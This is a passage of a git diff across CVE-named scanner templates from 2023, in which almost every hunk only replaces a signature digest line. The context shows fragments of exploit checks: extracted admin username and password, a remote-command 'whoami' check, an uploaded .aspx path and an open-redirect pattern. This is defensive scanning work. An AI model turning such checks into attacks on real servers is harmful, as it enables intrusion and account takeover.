4b0a0048304602210094d1da811d59592837714673bb306836a768a2450c197630671c366a384f87e9022100f3be739f36993a986b5f670b0004217e59026284faa1930c92203169e6fbfa64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100893365651019a48974c7772404a1a5e1bf1c27191b6661d84a796cb9fedcc462022100bba9224e520251fcd68ade3f4fbcfa7557380dfd77eeec46970f3ea8f930d78a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index de72d1556a..b626b9186c 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ab95cad35e5dc938efd7d6b61c067c225b1b5db05ba420a90b83c3e944f7e43022044d08dd4379dc38acdb9b5a5aeb2cffcd30d0a608aea1c9e622135c2f087db39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220653e5fe2976692c3c881761bdc58112c952b2c144074c8042a66f4521467dfc00221008236c69d7bbe67c34bed553ea0870b8f1419031871e38a1644213017c0949d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 6083bb470a..8291fc8a27 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 303 -# digest: 490a0046304402207f782b159b26b41f6b49ca4263a7106cbc2ef40aba7e1c835f44948dcd5c9731022035bed350905f56247f1d8d9aef6e107d58accb233e8ebb5bc8e8e2f78363f2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e32d205cdc41979a8510ec3c5491b73e578f35e1f2c728a0834360098b8c21502203fc65ab87a9ec06204ed5ee8392f6a8063e68afa34cdd393f968fe8081616137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 31e7f7266f..f677a152bf 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -78,4 +78,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048f769f84bc3e713a4aaf0510d2310cf2fa4c1f267e818f139d8c2c695d75af6022035cac70cbbb1ca8758491a2c026365cf8f96d067cdb375d4f3f2570a28171663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220426a8d82659122f39b1e0704f4854f0d4f6b4f2567d07705a37749887bcebf6b022100f6e1952745c3cec3bf7f8248f1c0fa04d58a0aab1fd86e65cab496dc4dfac1dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index a597b15ad2..24be618612 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a3a8ab93d344a4ea4552af7e38e910f1d753961585a43185a1c2aceb03385e1022100a393cf6a17ba4fc35342bd2c698a9bc9fb108546b52580c6bff53c0a76f26fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2dc7521c04ad3d5386510be4e09f0631e6d709fe85d9489449847ade8f7e892022100b6256d0260f230a9a6fe5d4ea8c10a629218c2b7eb52ac89a9bcf4406692980c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 5e9e4c3848..0f00ff096a 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee12904d65e9c992c05a8c326ff56e80b778ef16acda7ced68f94e57609f2c58022100cb41bf91ee715b8d3da808ba74a8e3bf043eb12511541341d3ede714a88843e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220253eb38bfa15b32b565d0d52729a0d49290b60292a800854d9f767c96b77ab7b022058b19983a77756f40936f9dbf16bce4b071ab4a0eb65d5832c1dbac9b819bf0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 42bdbd181c..bb491ff74f 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -80,4 +80,4 @@ http: dsl: - '"USER: "+ username' - '"PASS: "+ password' -# digest: 4a0a00473045022100ac6a95dafe4fdeff2f77958d55a402758e31fd3369fc22f5db6c8b1ea6951ec7022071d32dfbe93ae322d8d02e50d17dd9bbeace387055752ba20184441546549d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c2e72b3a46b67fa6502325f5c5bc179706e5ce1e349454522f1e336215dc27b02204a79690ff8837f5737d444a08704269bfa1db14661d196aecec6ca17238ff13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 60b9df90e3..077317adf8 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -59,4 +59,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 4b0a00483046022100bfe2427057a021c02b45e8933fad188130ca08bbb54211b7d88907f02834dce6022100d073c6584b72693b5d1493b8fc4df8ff572a6c26046d83a428f83dfba54cec0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021d971dc8fe578f1e5f5ce2badbea31b706f6b7e2381821e537412885b0b92b402201de72236af715dca5a31bf2584f4c350a1bffefdcd3b6b9c06ed2310c47c52bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index af36609021..bb6c9943ea 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022076aa83db4416dab98b44af5bbef532fbcc276d86523e0cbb68791c6f23624d9202204df4ce1bc02f82a0e4f75d2b8dbdc207c612b747fd45f47dc8ba90350a1674a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f2decf34789a5809be2140d5c00a0c4197394a365b52d684aa03652b9274511022100e57b85ad71d947a8fcd9a3c2caff691db97c565be9493fbcdea1969241dabb92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 3e8b5fb5f5..8ccbc1aa8a 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - x_vuln_check # prints the output of whoami -# digest: 490a0046304402207a2fdad5fe27eb6c457c1bdac60461a10e3dd24f3b61a3883903ef1492f18d7202203ef5a8e34b86a3e1e139c76a3daee72643cb00ae3205564fa729bf4ce9a148ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc1071e5e566ae86e5182333bd3d7a6c8ae42216e60b42a51f6d0caf6d4b563f022100efb619a364faf3da600dd66d185b85d4c528abb80303ba80338a9c8c51b4a672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index 43abde8090..d8131fbb09 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -73,4 +73,4 @@ http: regex: - '"sessionid": "([a-z0-9]+)"' internal: true -# digest: 490a004630440220534282c43668c1c17af9cf7ca5cdb4ae4bbf009790f5d229d10fbd4129fe1b34022073d7f8756dba9051bceecff5bb2af4da03f6abfd1f4becbb46f585324c435ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203539abafafbf0bca15ce3302802af0f0456908310129b09f231f8712a23da38b02206a15655120ce0acb4c72c179916a9a2b01677792f5d88b73f3299b05fb4ffb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index c852e683c0..b90affafa9 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Tiempo")' condition: and -# digest: 4a0a00473045022100e95f455156aec7ad579fbca4f3894390f4c3828cdfb03bdc3f1476c3194bac0302205af112e2d4a7bd057125852239530818792a4b650e41ff76eb49e3d5fe85c594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5df4e755941197a8a9e2b7ea2c47fa26d6a10d4761122622cc0af24b7ffba7e02205cd5b5968e669da5518df4c6dc585b02292aada0f3eb00691be0ba9acd56b59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 5cebe1e454..f8a9a46def 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c5379821457ef92f3e634b3aa210084805f8dfebe4025face5ad541fa49a074802206972fe09c5c8eafeb44d04cbda0c68080ea1354dc53a9c44f5d65a679d398e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8fade8a9a8fefd9bbec8924947c2381ced72d0aa735a8a0d52f6556249f7a67022100cd34d8ad4cb2d735c5cfbc8a38d0d054dd5c95a9d3f8512127ac85d535ea7ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 6a6de73694..96e550d512 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea898a0ee3e7998bb3be0741ebb31686b6746789bfc38aa09c3d751d6c088dd9022100f24fab6cecd2ddc7672fa6f8c51dfc9851aed21ab09178b2994b03ef0a42b92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100891756170ebb7d1c8fc3b2cea372a6b589d3582e1c83e28fbfd495196c4ad765022100c4cf50470f6f470682a20372817779dd9f94f25c2a451986a4189fe3a8a2a464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 870e53afa4..f02c6d26df 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207bfb7fc9356679873674bfb87b497551fbe9df9d6015d6c609aad585022a83ec022100eb1090e63e1b40864063314df8fad93909dea07395360cb4ec508212ee04d940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c57b83498f88294e948cfa0e482499061ced121949be027b7a730ddcaf61100022066dcd5b777f3b89c82652d0780d0f4c11be38a15a61de976da7d10375deb3e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 230471e3c6..9c9afb6f06 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -53,4 +53,4 @@ http: - status_code_1 != 403 # Wordfence - contains(body_2, "pmpro_updates") condition: and -# digest: 490a00463044022015c188952fcdb9afb70b9a5d2751a7a6b30e64a2e70652f54f09e9f340e236f202203acc5d2c37b01961a2b0901d983aa12ac70bfef13910d8cb846454bb17078d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aa83e6f293f332c02d8a9ada084af631fa84e58635b0ee65df029638fbd3409022048777f3132bb7ea017b47e5853e7742ade34d05d38b4da9edd3d8380dd197634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 21341d813d..3238ae18db 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -49,4 +49,4 @@ http: - 'status_code_1 == 200' - 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")' condition: and -# digest: 490a0046304402202404926dcf3a6a42dccec5b59e3d4dc2a13748530e430330c1563e0d676d440002207238a9a44101263d3b8d936b7e391dd9274756d519f77c7f49df13faab120930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce855e670e183a3c0c3f09471253246615d2b5faf6c6e9d1156669c259f16abe02202d77885086d1d097ed3172a6980ca5784d9c874d2bd06d38c32e8128a197e0a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 0dbd72dd1e..3e1d00cb18 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -44,4 +44,4 @@ http: - 'contains(body, "")' - 'contains(body, "qem_calendar")' condition: and -# digest: 480a00453043021f3e95e9556a9b9ec5ade59d7f4572f3867d7c2c8a1d7b95ae257a372f41c7ea02203ca63137dbaab35e0a9cd15cdc7b6002cf777667358a298c96fe3f5703172f5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a228a7862f653f746c8a54358638b762b4f431d226ad393cfcee63002d646ad002210089dfd526bc3fb3e3a4b6d2d7fe00fc7f64cf427ff96502715c2df1956d4d494b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 5eed092666..1b3226dc7e 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b3170213b0f1a447866043356305b581a32458c87e9ec2841fba4480f233cf07022100ac9d1b4b13994df1e15d76984cc662270f9540f5910faed4c46ee75e5297fb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011d1689f5448355a69a24aed9e5d0f916586008da1dbac8cd0605f9726d70b28022100aa03325f5120eb1358d6c1ea5e0b67037507a78ead26f9934782a7b27d56214d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 32942a9671..82fb7bb236 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -72,4 +72,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4a0a0047304502201dc691af618aeb7ae1784f119f04c2ae83a05a8b759601debe738dd5c11308e1022100a5df5635703f52bc26e0ed9760ccc09d6f92a23a35e8c13c9b272a203d54b34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008e337edd5fc7cd4ffe717d48ac5217c2c11ffc2aef83df2bd066df168ee4cd410221009a00492b8a190c833bf7e77a791a5735edbce79ec4ee0257d9d2ddb300f32221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index def70983fc..101c556043 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f1a8859b2be34845c6e9ff983c9ab9fc1741ee2e59af7319158de1e37c2002850221009b6444bdf0c4f9f9c9da30901088c17b893d690461a859cb5a97e2488a963ce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220365ee0f73788da3e66ee9797c957e719253f33c9506e0d7c2c89d97726f8e8340220026a8ffab7377814fb519871b7eb68dc65593207bf22d27c3a7870aa89c309f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 8ffeb915f2..9da9704b3e 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 303 -# digest: 4a0a00473045022069dc022651b4fb9af6a01bd55d548680f03edd9debffa187316d1b018f1209cc022100c92c5328721c039369314c3c7035951e413c56f1862f781e9d73bac65cfa6719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f1f13980cd4248460f9b3b1861ba42a2bf081a0f62b990f1d8bc96e110664600220583f1bfff336bd27130c8b75bbef19662bc3aa44c1d6e1824dab2bb02cac91b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 276c8e855f..852978493c 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022054c3c87e069b7846742f839a48c18be5bc69b97802d64b2331e054b536034d060221008e48d0ad117709530cac2b848e0f5c767120497bc71b446ac4435ee05a22b65b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f5fa23c6975f41020d64c2d8fcf00e92fe5ac1c8fe8e17e5dfa2284fefbf180022100cde57721a573873e8f0f46f15a87d3e886385502949ed9f50aff36b9dccdfc94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index cff34a912b..c0faa3b565 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100864e11cd58027c669cee192c677ee283ed0733f2678005853b921cfb44f28b3102200322c72442e008b6ef888ff07403a0ec4d6adf83bcfc2588e2787801ef103cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022075936e59a6abe44eca6d08a907e1997d26c08a741ab9e8b33b1dd72ce0770618022100930a07f08705b2c3bc8f969b1342f7b7d1a6dc010a918a4dc424f8eb0861a7aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 1e612e38c9..127abc79a2 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4b793962f02a94d8db15533461bce0f9799f188a498b05b38d0da714a23c4ad0220610e78c9f9d83ddf1b56ac0ec677dc3aeec74ce80aee1e69b72de56930a880fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090072fab3f7daa8ad22f62f50828a414d2d9547e568b07649118acdd07b16f27022100ee65f1ca805c95fbb8768b88cd1839daef838ec8c290b5470a5e8203b511d478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 38441aeee6..60fe87763f 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100b9fde4e5a98c376353cf072f935c8a0b049c84919585134c7a52d0eb9623953f022000d7a1f8d0dad24a1042be1bc800c8bf3322dcd62b54fea3327e0face361a222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100badcc6f7c01e3ebfeba9d79731cabde3a35cf09507addd97975878d01d4d6bb1022100d93e39472b12d5b1c7403c5e5b8a719b384a1f13679d8992246b838cbe6f85f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index cfe10e1c0c..bed765c579 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -64,4 +64,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 4b0a00483046022100e02ace90a1a3782dc846f7db6c3799e3e6f2dbd7db12315587f79f87591c3e76022100d83634800b925f23dbb1f24ae13c6577e8531c7008b64b40c03a95995e205afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c13319c615b1019fdab585c8cbd7b2edee47b2af7154ef818ca85bad17fa41902203d468e94c8f9a7cc92a08383e2ea4e4d2f2aa462566a271bfa9c7ca37c8a54a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 41b6ab4fec..47806dddca 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -48,4 +48,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "Subnet masks")' condition: and -# digest: 490a0046304402207f21098ce5bf40eb4a6275ff15bb690cbde2da1648dff89f6ac3fb578d943bec022054add055809df92504ac4ebeff525e4c4182ece10d818fb597ffa9f48b7bf6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b43040d5ddff0d907d757322ca19e86d165f3d6ac79b7cc01317cefe96c180a90220747af3c14f10ca46f6e1696b2dac795c114cb9da5911337646a25b4e6a114e17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 69d9f78a53..40d7f5e4a8 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d08cf09e7dc5425596c3cca412921a6990b702806ce847b868b3179a77b3dfca022051df8f622f5f78b42f4466f8f3cf2e9fbc6b5eccf03b1270d759323219651ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1e27a0f34dc14bd9119c0d0e138879127d2a945f22432b0ee16eefd4fae4fcd02202120d60f8a5b82dd8bb101b21fc46291819c8455bd065df6afa462cc7fb902f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 9c5546ff00..384df1bd0e 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100ceae583574e8508ec06b34037f78dc1c5f19ddc0b9d7c67ca4b8d421f11f32b802205b406cd0b8fb8a762e03ccc5cfbe8aedd976adc4e1b121163062d916f54bb57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069ec2106a76675c191d0555541954f4ca1efe54795dc909ab5799ae5a3c45c1602204731da01a25e1b558aa2849b09255dfd79d27630dbdd890f7a2834424f17ae4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index daf4ce9c0e..84c8146af2 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a433ef07e25a34aa6e771afe6bcd7421f7d8f9da2a819104633dfaebb224713022057a7b3b74f01ee1509016fec6b6e58f2647005bff55b022b5ac8592a800fe4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074f3529913e227e5f0411e5d925d209de9847be12d25d58a096ebff0c4540b6a02204ff305fe3af41fc2553100e207ba452f264233f8bae6607702862cd0b0b5fa67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index c412ab515a..9c532f85dc 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100d44c6fd6e068737f5ac44173614742e26bb00e419da5422b4137ec5d86e4f57d022100f437027151fbfc03ee45e7332fab84cc9f46e0b134ce5ac0d3948dd9d6147a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1a352672a989af8e3c79dfa0ed6be743b40148495bfe0de7495e721c3d3cf30022100dbadd06ff944bb8596396571fff0382198c298180fd68270d546b2d3f2500ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 9c196102e7..98bb1ce4c9 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce2bf923005a767a1b859b3e4f2a4fce8709e03f3e8ca3913a9b86099ccf4d6d02203544ccb00bbe8541385556ded06192cb9d058e991038779cf79a4934da6495bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a410d762f000309f54731519ff76b949ba22e581faa23443d375858f72011b5022100f0fc76b5b21173b158bd9d70a7ab47b52ba71d848be5e0a48c35caa98aec82d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index be536f257c..d01133cc94 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -78,4 +78,4 @@ http: - 'FID,([aA-zZ_]+),' internal: true part: body_2 -# digest: 4b0a00483046022100a3222cc7b1d0a9ddb3db8e1edf4d46d53dc3d1e5c5183e91d231d4b6d2965c23022100866dde35ab00b7554d055458ac9c8e99054504e1b114976d1d16b238249aa447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b053edce21fd6de480945838b88b1d0a40a78956855915543949ee99ce77afd0220279858bce10c1808a98ffa467c52d81d8867015b84472be11d80e3acc10e5cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index 5bf9e89c79..c9c2edc4e8 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -97,4 +97,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e73ac9fdf5b0743ff5219b36631bae363aa2c377bcb325db674d83289fa2f5c022100ad756a8663c7df0962fece18df6230af5d78c6bb80beb1e3e0fdbc3e7ee4d25e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index da87fc1444..8a8b7d8f29 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 490a0046304402207b82c78496d0686df4a8b54ee3e7430a2aae6a4d50f75c48c28383063a9c1851022055cbcd42db1a3790b0acdd4afd092d56e421d551edd10257dab81b1e6c7cbe78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220266625a03a385660482d100a25922e690653fdba45bf1e1a41a827fd8af8caa6022100ca808f4d98cd7c2a45723e7770bcb998dbaf4affca5206da3a7bd75d4ff13283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 640deeabc5..3628b7d142 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 